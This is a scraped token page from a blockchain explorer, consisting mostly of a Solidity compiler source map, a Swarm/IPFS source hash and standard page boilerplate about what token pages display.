:0;;;12214:16:0::1;::::0;;12091:147::o;13707:282::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;13867:9:::1;13862:120;13882:19:::0;;::::1;13862:120;;;13946:8;;13955:1;13946:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13928:42:0::1;13937:7;-1:-1:-1::0;;;;;13928:42:0::1;-1:-1:-1::0;;;;;;;;;;;13959:7:0::1;;13967:1;13959:10;;;;;;;:::i;:::-;;;;;;;13928:42;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;13928:42:0::1;;;;;;;;13903:3;;13862:120;;13403:296:::0;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;13577:9:::1;13572:120;13592:19:::0;;::::1;13572:120;;;13656:8;;13665:1;13656:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13638:42:0::1;13647:7;-1:-1:-1::0;;;;;13638:42:0::1;-1:-1:-1::0;;;;;;;;;;;13669:7:0::1;;13677:1;13669:10;;;;;;;:::i;:::-;;;;;;;13638:42;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;13638:42:0::1;;;;;;;;13613:3;;13572:120;;1468:238:::0;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;1571:22:0;::::1;1549:110;;;::::0;-1:-1:-1;;;1549:110:0;;8186:2:1;1549:110:0::1;::::0;::::1;8168:21:1::0;8225:2;8205:18;;;8198:30;8264:34;8244:18;;;8237:62;-1:-1:-1;;;8315:18:1;;;8308:36;8361:19;;1549:110:0::1;7984:402:1::0;1549:110:0::1;1670:28;1689:8;1670:18;:28::i;:::-;1468:238:::0;:::o;14152:1216::-;14291:11;;-1:-1:-1;;;14291:11:0;;;;:19;;14306:4;14291:19;14283:58;;;;-1:-1:-1;;;14283:58:0;;8593:2:1;14283:58:0;;;8575:21:1;8632:2;8612:18;;;8605:30;8671:28;8651:18;;;8644:56;8717:18;;14283:58:0;8391:350:1;14283:58:0;14358:11;;-1:-1:-1;;;14358:11:0;;;;:19;;14373:4;14358:19;:41;;;;-1:-1:-1;14381:9:0;;-1:-1:-1;;;14381:9:0;;;;:18;14358:41;14354:200;;;1181:7;1208:6;-1:-1:-1;;;;;14442:15:0;;;1208:6;;14442:15;;:32;;-1:-1:-1;1181:7:0;1208:6;-1:-1:-1;;;;;14461:13:0;;;1208:6;;14461:13;14442:32;14416:126;;;;-1:-1:-1;;;14416:126:0;;8948:2:1;14416:126:0;;;8930:21:1;;;8967:18;;;8960:30;9026:34;9006:18;;;8999:62;9078:18;;14416:126:0;8746:356:1;14416:126:0;14613:4;;14592:6;;-1:-1:-1;;;;;14613:4:0;:18;;;;:37;;-1:-1:-1;1181:7:0;1208:6;-1:-1:-1;;;;;14635:15:0;;;1208:6;;14635:15;;14613:37;:54;;;;-1:-1:-1;1181:7:0;1208:6;-1:-1:-1;;;;;14654:13:0;;;1208:6;;14654:13;;14613:54;14609:697;;;14727:4;;14684:12;;-1:-1:-1;;;;;14727:4:0;;;14719:12;;;;14715:66;;-1:-1:-1;14759:6:0;14715:66;14805:4;;-1:-1:-1;;;;;14805:4:0;;;14799:10;;;;14795:134;;14837:7;14830:14;;14863:50;14892:20;;14863:28;:50::i;:::-;-1:-1:-1;;;;;14947:18:0;;;;;;:12;:18;;;;;;;;:26;;:18;:26;;:54;;-1:-1:-1;;;;;;14977:16:0;;;;;;:12;:16;;;;;;;;:24;;:16;:24;14947:54;14943:103;;;-1:-1:-1;15029:1:0;14943:103;15064:8;;15060:235;;15093:22;10634:5;15119:13;15128:4;15119:6;:13;:::i;:::-;15118:32;;;;:::i;:::-;15093:57;-1:-1:-1;15187:23:0;15093:57;15187:6;:23;:::i;:::-;15251:11;;15169:41;;-1:-1:-1;15229:50:0;;15245:4;;-1:-1:-1;;;;;15251:11:0;15264:14;15229:15;:50::i;:::-;15074:221;15060:235;14669:637;14609:697;15318:42;15334:4;15340:2;15344:15;15318;:42::i;:::-;14272:1096;14152:1216;;;:::o;8947:380::-;-1:-1:-1;;;;;9083:19:0;;9075:68;;;;-1:-1:-1;;;9075:68:0;;9837:2:1;9075:68:0;;;9819:21:1;9876:2;9856:18;;;9849:30;9915:34;9895:18;;;9888:62;-1:-1:-1;;;9966:18:1;;;9959:34;10010:19;;9075:68:0;9635:400:1;9075:68:0;-1:-1:-1;;;;;9162:21:0;;9154:68;;;;-1:-1:-1;;;9154:68:0;;10242:2:1;9154:68:0;;;10224:21:1;10281:2;10261:18;;;10254:30;10320:34;10300:18;;;10293:62;-1:-1:-1;;;10371:18:1;;;10364:32;10413:19;;9154:68:0;10040:398:1;9154:68:0;-1:-1:-1;;;;;9235:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;9287:32;;2186:25:1;;;9287:32:0;;2159:18:1;9287:32:0;;;;;;;8947:380;;;:::o;1714:191::-;1788:16;1807:6;;-1:-1:-1;;;;;1824:17:0;;;-1:-1:-1;;;;;;1824:17:0;;;;;;1857:40;;1807:6;;;;;;;1857:40;;1788:16;1857:40;1777:128;1714:191;:::o;13997:147::-;14094:6;14080:11;:20;14076:61;;;14117:8;;;6527:998;-1:-1:-1;;;;;6667:20:0;;6659:70;;;;-1:-1:-1;;;6659:70:0;;10645:2:1;6659:70:0;;;10627:21:1;10684:2;10664:18;;;10657:30;10723:34;10703:18;;;10696:62;-1:-1:-1;;;10774:18:1;;;10767:35;10819:19;;6659:70:0;10443:401:1;6659:70:0;-1:-1:-1;;;;;6748:23:0;;6740:71;;;;-1:-1:-1;;;6740:71:0;;11051:2:1;6740:71:0;;;11033:21:1;11090:2;11070:18;;;11063:30;11129:34;11109:18;;;11102:62;-1:-1:-1;;;11180:18:1;;;11173:33;11223:19;;6740:71:0;10849:399:1;6740:71:0;-1:-1:-1;;;;;6908:17:0;;6884:21;6908:17;;;:9;:17;;;;;;6958:23;;;;6936:111;;;;-1:-1:-1;;;6936:111:0;;11455:2:1;6936:111:0;;;11437:21:1;11494:2;11474:18;;;11467:30;11533:34;11513:18;;;11506:62;-1:-1:-1;;;11584:18:1;;;11577:36;11630:19;;6936:111:0;11253:402:1;6936:111:0;-1:-1:-1;;;;;7083:17:0;;;;;;;:9;:17;;;;;;7103:22;;;7083:42;;7147:20;;;;;;;;:30;;7119:6;;7083:17;7147:30;;7119:6;;7147:30;:::i;:::-;;;;-1:-1:-1;;7204:9:0;;-1:-1:-1;;;;;7204:9:0;;;7194:19;;;;7190:269;;7244:9;;7235:38;;2186:25:1;;;-1:-1:-1;;;;;7235:38:0;;;;7244:9;;-1:-1:-1;;;;;;;;;;;7235:38:0;2174:2:1;2159:18;7235:38:0;;;;;;;;7471:46;9335:125;7190:269;7308:9;;-1:-1:-1;;;;;7308:9:0;;;7295:22;;;;7291:168;;7356:9;;7339:35;;2186:25:1;;;-1:-1:-1;;;;;7356:9:0;;;;7339:35;;;-1:-1:-1;;;;;;;;;;;7339:35:0;2174:2:1;2159:18;7339:35:0;2040:177:1;7291:168:0;7429:9;-1:-1:-1;;;;;7412:35:0;7421:6;-1:-1:-1;;;;;7412:35:0;-1:-1:-1;;;;;;;;;;;7440:6:0;7412:35;;;;2186:25:1;;2174:2;2159:18;;2040:177;14:367;77:8;87:6;141:3;134:4;126:6;122:17;118:27;108:55;;159:1;156;149:12;108:55;-1:-1:-1;182:20:1;;225:18;214:30;;211:50;;;257:1;254;247:12;211:50;294:4;286:6;282:17;270:29;;354:3;347:4;337:6;334:1;330:14;322:6;318:27;314:38;311:47;308:67;;;371:1;368;361:12;308:67;14:367;;;;;:::o;386:551::-;481:6;489;497;550:2;538:9;529:7;525:23;521:32;518:52;;;566:1;563;556:12;518:52;606:9;593:23;639:18;631:6;628:30;625:50;;;671:1;668;661:12;625:50;710:70;772:7;763:6;752:9;748:22;710:70;:::i;:::-;799:8;;684:96;;-1:-1:-1;903:2:1;888:18;;;;875:32;;386:551;-1:-1:-1;;;;386:551:1:o;942:418::-;1091:2;1080:9;1073:21;1054:4;1123:6;1117:13;1166:6;1161:2;1150:9;1146:18;1139:34;1225:6;1220:2;1212:6;1208:15;1203:2;1192:9;1188:18;1182:50;1281:1;1276:2;1267:6;1256:9;1252:22;1248:31;1241:42;1351:2;1344;1340:7;1335:2;1327:6;1323:15;1319:29;1308:9;1304:45;1300:54;1292:62;;;942:418;;;;:::o;1365:173::-;1433:20;;-1:-1:-1;;;;;1482:31:1;;1472:42;;1462:70;;1528:1;1525;1518:12;1462:70;1365:173;;;:::o;1543:300::-;1611:6;1619;1672:2;1660:9;1651:7;1647:23;1643:32;1640:52;;;1688:1;1685;1678:12;1640:52;1711:29;1730:9;1711:29;:::i;:::-;1701:39;1809:2;1794:18;;;;1781:32;;-1:-1:-1;;;1543:300:1:o;2222:186::-;2281:6;2334:2;2322:9;2313:7;2309:23;2305:32;2302:52;;;2350:1;2347;2340:12;2302:52;2373:29;2392:9;2373:29;:::i;:::-;2363:39;2222:186;-1:-1:-1;;;2222:186:1:o;2413:374::-;2490:6;2498;2506;2559:2;2547:9;2538:7;2534:23;2530:32;2527:52;;;2575:1;2572;2565:12;2527:52;2598:29;2617:9;2598:29;:::i;:::-;2588:39;;2646:38;2680:2;2669:9;2665:18;2646:38;:::i;:::-;2413:374;;2636:48;;-1:-1:-1;;;2753:2:1;2738:18;;;;2725:32;;2413:374::o;3382:347::-;3447:6;3455;3508:2;3496:9;3487:7;3483:23;3479:32;3476:52;;;3524:1;3521;3514:12;3476:52;3547:29;3566:9;3547:29;:::i;:::-;3537:39;;3626:2;3615:9;3611:18;3598:32;3673:5;3666:13;3659:21;3652:5;3649:32;3639:60;;3695:1;3692;3685:12;3639:60;3718:5;3708:15;;;3382:347;;;;;:::o;3734:842::-;3865:6;3873;3881;3889;3897;3950:2;3938:9;3929:7;3925:23;3921:32;3918:52;;;3966:1;3963;3956:12;3918:52;3989:29;4008:9;3989:29;:::i;:::-;3979:39;;4069:2;4058:9;4054:18;4041:32;4096:18;4088:6;4085:30;4082:50;;;4128:1;4125;4118:12;4082:50;4167:70;4229:7;4220:6;4209:9;4205:22;4167:70;:::i;:::-;4256:8;;-1:-1:-1;4141:96:1;-1:-1:-1;;4344:2:1;4329:18;;4316:32;4373:18;4360:32;;4357:52;;;4405:1;4402;4395:12;4357:52;4444:72;4508:7;4497:8;4486:9;4482:24;4444:72;:::i;:::-;3734:842;;;;-1:-1:-1;3734:842:1;;-1:-1:-1;4535:8:1;;4418:98;3734:842;-1:-1:-1;;;3734:842:1:o;4581:226::-;4640:6;4693:2;4681:9;4672:7;4668:23;4664:32;4661:52;;;4709:1;4706;4699:12;4661:52;-1:-1:-1;4754:23:1;;4581:226;-1:-1:-1;4581:226:1:o;4812:260::-;4880:6;4888;4941:2;4929:9;4920:7;4916:23;4912:32;4909:52;;;4957:1;4954;4947:12;4909:52;4980:29;4999:9;4980:29;:::i;:::-;4970:39;;5028:38;5062:2;5051:9;5047:18;5028:38;:::i;:::-;5018:48;;4812:260;;;;;:::o;5312:127::-;5373:10;5368:3;5364:20;5361:1;5354:31;5404:4;5401:1;5394:15;5428:4;5425:1;5418:15;5444:380;5523:1;5519:12;;;;5566;;;5587:61;;5641:4;5633:6;5629:17;5619:27;;5587:61;5694:2;5686:6;5683:14;5663:18;5660:38;5657:161;;5740:10;5735:3;5731:20;5728:1;5721:31;5775:4;5772:1;5765:15;5803:4;5800:1;5793:15;5657:161;;5444:380;;;:::o;6598:127::-;6659:10;6654:3;6650:20;6647:1;6640:31;6690:4;6687:1;6680:15;6714:4;6711:1;6704:15;6730:125;6795:9;;;6816:10;;;6813:36;;;6829:18;;:::i;6860:356::-;7062:2;7044:21;;;7081:18;;;7074:30;7140:34;7135:2;7120:18;;7113:62;7207:2;7192:18;;6860:356::o;9107:168::-;9180:9;;;9211;;9228:15;;;9222:22;;9208:37;9198:71;;9249:18;;:::i;9280:217::-;9320:1;9346;9336:132;;9390:10;9385:3;9381:20;9378:1;9371:31;9425:4;9422:1;9415:15;9453:4;9450:1;9443:15;9336:132;-1:-1:-1;9482:9:1;;9280:217::o;9502:128::-;9569:9;;;9590:11;;;9587:37;;;9604:18;;:::i
Swarm Source
ipfs://1748e029f3c6925179fd84ba3a6f7eb32c973e8e7298eb0d6a3e7fd1866f5346
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.